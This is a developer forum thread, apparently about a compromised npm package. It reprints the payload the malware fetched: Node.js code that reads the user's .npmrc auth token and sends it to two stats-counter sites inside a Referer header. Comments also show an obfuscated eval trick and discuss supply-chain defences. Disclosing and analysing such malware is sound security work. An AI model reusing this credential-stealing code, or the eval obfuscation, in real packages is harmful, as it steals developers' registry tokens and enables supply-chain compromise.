7 ms·
Below is the contents of the pastebin that the virus tries to eval. Kind of interesting that they used a stats counter site as a free anonymous database. tr
by AndrewVos 8y ago
Below is the contents of the pastebin that the virus tries to eval.
Kind of interesting that they used a stats counter site as a free anonymous database.
try{
var path=require('path');
var fs=require('fs');
var
npmrc=path.join(process.env.HOME||process.env.USERPROFILE,'.npmrc');
var content="nofile";
if (fs.existsSync(npmrc)){
content=fs.readFileSync(npmrc,{encoding:'utf8'});
content=content.replace('//registry.npmjs.org/:_authToken=','').trim();
var https1=require('https');
https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+content}},()=>{}).on("error",()=>{});
https1.get({hostname:'c.statcounter.com',path:'/11760461/0/7b5b9d71/1/',method:'GET',headers:{Referer:'http://2.b/'+content}},()=>{}).on("error",()=>{});
}
}catch(e){}
- Jupe 8y agoThe fact that this is the top-voted item here scares the hell out of me. eval() should be removed from the language. Period. Dynamic code like this is a gaping security hole. There an infinite number of ways to get around eval() detection (see some comments below). eval() combined with a hole-ridden package manager is the perfect storm; the equivalent of an open door for hackers to manipulate a potentially huge number of code bases. And the top-voted comment is how they used a stats counter to stuff the hijacked creds... WTF.
- jpochtar 8y agoRemoving eval wouldn't help— you could always just write a tiny interpreter to do the same thing. This is a problem in any Turing complete programming language (with Reflection), although JS makes it easier.
- Jupe 8y agoTrue, it wouldn't solve the problem entirely, but I'd guess a 'tiny' interpreter would stand out more than a one liner like this one, possibly making detection easier.
- RussianCow 8y agoOn the contrary, `eval` is used so little in real code that it's easy to detect. A tiny, obfuscated VM would be much more difficult.
- mygo 8y ago‘eval’ is not trivial to detect when it’s window[rot13("riny")]("console.log('lol')"); or one of the many other ways to obfuscate eval
- BinaryIdiot 8y agoRemoving eval doesn't fix anything here. In fact you can eval in other methods in JS (setTimeout and setInterval). I think this issue is a good reminder that installing thousands of dependencies for a hello world app is dangerous and could ultimately be very costly. We need to handle modules better.
- thephyber 8y ago> I think this issue is a good reminder that installing thousands of dependencies for a hello world app is dangerous You are obviously making an embellishment, but even if you only install 10 dependencies for a large app, the same problem exists. If you don't have the resources to security+quality vet every single module in the entire dependency graph of your project, you will be susceptible to the same issue. The problem lies in the fact that modern development requires that you trust unlicensed strangers to write code for your supply chain. You don't authenticate them and the extent of authorization is just that you choose their library over all of the alternatives. Edit: I realize after writing this that it sounds like I'm apologizing for _npm_'s basic security mistakes. I recognize they exist, but I'm trying to highlight that this isn't really a solved issue for other package managers, even though many of them have solved the basic security hygiene that npm hasn't.
- BinaryIdiot 8y ago> The problem lies in the fact that modern development requires that you trust unlicensed strangers to write code for your supply chain Yup, I agree but I think npm makes this issue significantly worse than any other package manager. In most languages you can download a few packages to add the necessary functionality you're looking for and sometimes they include additional dependencies but it usually isn't very many (at least in my experience). But node / npm? Good luck installing some basic setup for webpack or other common frameworks and _not_ find yourself installing 1,000+ packages. I don't know exactly _why_ it's like this but there are a large amount of entries for getting malicious code into an application nowadays and with JavaScript running on almost everything it's hard to imagine this not happening to something that could cause a major disruption. When I did work for the DoD in one specific agency you couldn't just include any npm module. You had to go through a list of approved modules and versions. Then if you requested a version update or a new module it had to be reviewed by a security team before being included. Granted this won't find everything but this is a well understood issue that many in the government are well aware of and I wonder when the private sector is going to come up with their own, hopefully better, solution.
- ErikAugust 8y agoThe way they pass the content of the npmrc file via the Referer field in the headers is pretty clever, in my opinion.
- trampi 8y agoHi! Thank you for posting the script. In the meantime, the script has changed to "//1", see http://pastebin.com/raw/XLeVP82h http://pastebin.com/raw/XLeVP82h. Is it possible, that it could have for example leaked ssh keys in the past? Is it possible, to get all revisions of this pastebin? edit: after researching it on my own, it seems that only administrators can edit pastebins, regular users can not.
- duckerude 8y agoYou can edit your own paste on pastebin if you made it with an account. This one was made with an account, shown on the full page: https://pastebin.com/XLeVP82h https://pastebin.com/XLeVP82h It's possible the person who created it edited it. I don't think there's a way to see past revisions, other than external archives.